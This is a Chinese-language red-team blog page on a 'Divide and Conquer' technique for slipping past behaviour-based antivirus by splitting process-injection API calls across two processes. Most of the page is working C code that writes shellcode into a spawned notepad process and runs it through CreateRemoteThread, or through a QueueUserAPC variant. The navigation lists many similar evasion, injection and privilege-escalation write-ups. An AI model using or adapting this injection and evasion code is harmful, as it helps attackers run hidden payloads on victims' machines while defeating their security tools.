idiotc4t's blog
搜索文档…
idiotc4t's blog
关于这个博客
武器设计
我也不知道能不能写
C2手稿
先占个位置
武器化
COM组件相关的武器化开发技术
攻击demo的bof改造
Go项目反射改造
VulnBins的利用 (vuln driver)
红队研究
NtQueryInformationProcess逆向
NetUserAdd逆向
应急响应
WannaMine4.0专杀的一些技巧
防御逃避
ReflectiveDLLInjection变形应用
Execute-Assembly实现
ShadowMove复现与思考
载入第二个Ntdll绕Hook
编译时混淆字符串&函数调用
基于线程结束的EventLog绕过
动态获取系统调用(syscall)号
基于内存补丁的AMSI绕过
基于API Hook和DLL注入的AMSI绕过
基于内存补丁ETW的绕过
基于断链的DLL隐藏
基于HEX字符串执行的AV绕过
CobaltStrike Argue命令实现
简单的分离免杀
伪装PPID规避检测
伪装命令行规避检测
通过重写ring3 API函数实现免杀
动态调用无导入表编译
基于Registry的虚拟机检测
利用杀毒软件删除任意文件
反转字符串绕杀软
重新加载.text节拖钩
x64转换层&跨位数进程注入
代码与进程注入
Divide and Conquer
Clipboard Data Deliver
.NET Reflective Injection
APC Thread Hijack
CreateRemoteThread
APC Injection
Mapping Injection
Bypass Session 0 Injection
WhiteFile Offset Table Generate Shellcode
Early Bird
Early Bird & CreateRemoteThread
TLS Code Execute
SEH Code Execute
APC & NtTestAlert Code Execute
NtCreateSection & NtMapViewOfSection Code Execute
Process Hollowing
SetContext Hijack Thread
DLL Hollowing
权限提升
基于注册表劫持BypassUAC
基于dll劫持BypassUac
通过com组件BypassUAC
通过复制Token提权到SYSTEM
通过code&dll注入提权到SYSTEM
通过伪装PPID提权到SYSTEM
通过系统服务提权到SYSTEM
权限维持
主机特征绑定木马
寻找有价值的文件
获取机器安装的软件
通过API添加Windows用户
Detours InLine Hook
DLL劫持
RID劫持
自启动服务
编写简单远控
注册表自启动项
GitBook 提供支持
Divide and Conquer

简介

看到了一种比较有意思的手法,现在的杀软会关注函数的执行链, theevilbit公开了一种通过不同进程分离执行API,绕过基于行为的AV检测。
常见的行为检测会有监控堆栈的调用链和hookapi记录行为,这种分离执行方式都能绕过。

流程

  1. 1.
    创建傀儡进程
  2. 2.
    向傀儡进程写入payload
  3. 3.
    创建同文件进程传入pid
  4. 4.
    通过pid打开傀儡句柄
  5. 5.
    创建远程线程

代码

1
2
3
#include <stdio.h>
4
#include <windows.h>
5
unsigned char shellcode[] =
6
"\xfc78\x00";
7
8
int main(int argc, char* argv[]) {
9
10
if (argv[1]==NULL)
11
{
12
STARTUPINFOA si = { 0 };
13
si.cb = sizeof(si);
14
PROCESS_INFORMATION pi = { 0 };
15
16
CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
17
VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
18
WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);
19
20
char cmd[MAX_PATH] = {0};
21
wsprintfA(cmd, "%s %d", argv[0], pi.dwProcessId);
22
23
CreateProcessA(NULL, (LPSTR)cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
24
}
25
else
26
{
27
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, NULL, atoi(argv[1]));
28
CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)0x0000480000000000, 0, 0, 0);
29
}
30
31
32
return 0;
33
}
34
Copied!

同理

1
if (argv[1]==NULL)
2
{
3
STARTUPINFOA si = { 0 };
4
si.cb = sizeof(si);
5
PROCESS_INFORMATION pi = { 0 };
6
7
CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
8
VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
9
WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);
10
char cmd[MAX_PATH] = {0};
11
wsprintfA(cmd, "%s %d", argv[0], pi.dwThreadId);
12
QueueUserAPC((PAPCFUNC)0x0000480000000000, pi.hThread, NULL);
13
CreateProcessA(NULL, (LPSTR)cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
14
}
15
else
16
{
17
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, NULL, atoi(argv[1]));
18
ResumeThread(hThread);
19
}
20
Copied!

LINK

防御逃避 - 以前
x64转换层&跨位数进程注入
下一个 - 代码与进程注入
Clipboard Data Deliver
最近更新 10mo ago
复制链接
内容
简介
流程
代码
同理
LINK